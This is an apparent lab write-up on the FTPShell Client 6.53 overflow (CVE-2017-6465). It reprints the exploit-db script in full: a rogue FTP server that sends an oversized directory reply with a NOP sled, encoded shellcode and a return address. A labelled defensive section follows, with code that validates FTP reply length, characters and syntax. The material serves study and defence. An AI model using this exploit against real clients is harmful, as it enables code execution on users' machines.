0x00. Preface
FTPShell is a popular FTP tool for the Windows platform; the latest version of the client is 6.53: http://www.ftpshell.com/downloadclient.htm#
Lab environment: VMware + Windows XP SP3 EN
Vulnerable application download address: http://www.ftpshell.com/downloadclient.htm#
0x01. Exploitation
This buffer overflow is triggered while the client is in the authentication phase of establishing its connection to the FTP server. First, install FTPShell client 6.53 in the lab environment.
Here we build the malicious FTP server directly from the Python code provided by exploit-db:
# Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection
# Date: 2017-03-04
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.ftpshell.com/downloadclient.htm
# Version: Windows Server R2 x64
# Tested On: Windows Server R2 Standard x64
# CVE: CVE-2017-6465
# 2017-03-04: Software vendor notified
# 2017-03-06: No reply
# 2017-03-06: Publishing

# Python 2 script: the string literals below are byte strings.
import socket
import sys

shell = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
         "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
         "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
         "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
         "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
         "\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37"
         "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48"
         "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
         "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
         "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
         "\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48"
         "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
         "\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48"
         "\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43"
         "\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57"
         "\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
         "\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b"
         "\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53"
         "\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
         "\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49"
         "\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"
         "\x4e\x36\x43\x46\x42\x50\x5a")  # replaced with shellcode that pops up calc.exe

port = 21

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", port))  # bind to port 21
    s.listen(5)  # start listening as the FTP service
    print("[i] FTP server started on port: " + str(port) + "\r\n")
except:
    print("[!] Failed to bind the server to port: " + str(port) + "\r\n")

# 004B95DC in FTPShell.exe: PUSH ESI; RETN
EIP = "\xdc\x95\x4b"  # this address can still be used on WinXP SP3 EN
nops = "\x90" * 8
junk = "A" * (400 - len(nops) - len(shell))
buffer = nops + shell + junk + EIP  # construct the malicious buffer layout

while True:
    conn, addr = s.accept()
    conn.send('Welcome to your unfriendly FTP server\r\n')
    print(conn.recv(1024))
    conn.send("331 ok\r\n")
    print(conn.recv(1024))
    conn.send('ok\r\n')
    print(conn.recv(1024))
    conn.send('"' + buffer + '" is current directory\r\n')  # send the malicious buffer
Run the script to start the service.
When the FTPShell client on the victim machine connects to the malicious FTP server, the client crashes immediately and the shellcode is executed.
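As an added defensive example, not part of the original post or of the exploit-db script, the following Python shows the checks a client (or a proxy or IDS in front of one) should apply to server reply lines before copying them into a fixed-size buffer: a hard length cap, a printable-ASCII check, and RFC 959 reply syntax, plus a bounded line reader that cannot be grown past the cap by whatever the server sends. The sample session is constructed and mirrors the reply sequence of the malicious server above with plain "A" padding in place of the payload; MAX_REPLY_LEN is an assumed limit for this example, not a value from the advisory, and FakeConn is a stand-in for a socket so the code runs offline.

```python
import re
import string

# Assumed defensive cap on one reply line; RFC 959 sets no explicit limit,
# and this figure is not taken from the advisory.
MAX_REPLY_LEN = 256

# RFC 959 reply syntax: three digits, then a space (final line) or a dash
# (continuation line), then the text.
REPLY_RE = re.compile(r"^(\d{3})([ -])(.*)$")
PRINTABLE = set(string.printable) - set("\x0b\x0c")


def check_ftp_reply(raw):
    """Classify one raw reply line received from the server.

    Returns (status, code, text) where status is one of:
      'ok'            well-formed, printable and within MAX_REPLY_LEN
      'oversize'      longer than MAX_REPLY_LEN (the overflow condition)
      'nonprintable'  contains bytes outside printable ASCII (NOP sleds,
                      encoded payloads, little-endian addresses)
      'malformed'     does not match '<3 digits><space or dash><text>'
    """
    line = raw.decode("latin-1").rstrip("\r\n")
    if len(line) > MAX_REPLY_LEN:
        return ("oversize", None, None)
    if any(ch not in PRINTABLE for ch in line):
        return ("nonprintable", None, None)
    m = REPLY_RE.match(line)
    if not m:
        return ("malformed", None, None)
    return ("ok", int(m.group(1)), m.group(3))


def scan_session(replies):
    """Run check_ftp_reply over every reply of a session and return the
    findings that are not 'ok' as (reply index, status) pairs."""
    findings = []
    for i, raw in enumerate(replies):
        status = check_ftp_reply(raw)[0]
        if status != "ok":
            findings.append((i, status))
    return findings


def read_reply(conn, limit=MAX_REPLY_LEN):
    """Read one CRLF-terminated reply from conn without ever holding more
    than `limit` bytes: the server cannot push the buffer past the cap."""
    buf = bytearray()
    while not buf.endswith(b"\r\n"):
        if len(buf) >= limit:
            raise ValueError("reply exceeds %d bytes without CRLF" % limit)
        chunk = conn.recv(1)
        if not chunk:
            raise ConnectionError("connection closed mid-reply")
        buf += chunk
    return bytes(buf)


class FakeConn:
    """Minimal socket stand-in so the example runs offline: serves a
    constructed byte string through recv()."""
    def __init__(self, data):
        self._data = data

    def recv(self, n):
        chunk, self._data = self._data[:n], self._data[n:]
        return chunk


# Constructed session modelled on the malicious server's reply sequence,
# with plain 'A' padding standing in for the payload.
CONSTRUCTED_SESSION = [
    b"Welcome to your unfriendly FTP server\r\n",        # greeting carries no reply code
    b"331 ok\r\n",
    b"ok\r\n",                                          # login reply carries no code
    b'"' + b"A" * 400 + b'" is current directory\r\n',  # oversized PWD-style reply
]

if __name__ == "__main__":
    for idx, status in scan_session(CONSTRUCTED_SESSION):
        print("reply %d flagged: %s" % (idx, status))
    try:
        read_reply(FakeConn(CONSTRUCTED_SESSION[3]))
    except ValueError as e:
        print("read_reply refused the line: %s" % e)
```

The length cap is checked before the other two tests because it is the one that maps directly onto the bug class: a client that copies a server-supplied directory string into a 400-byte stack buffer has no defence once the line passes that length, whatever the bytes are. The printable and syntax checks catch the quieter variants (short replies carrying encoded payloads, or replies with no 3-digit code at all, as in the greeting and login replies of the session above).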
Note: I did not test this on Win2008 SP2.
0x02. Reference links
exploit-db: https://www.exploit-db.com/exploits/41511/
Buffer overflow exploitation of CVE-2017-6465 in FTPShell Client 6.53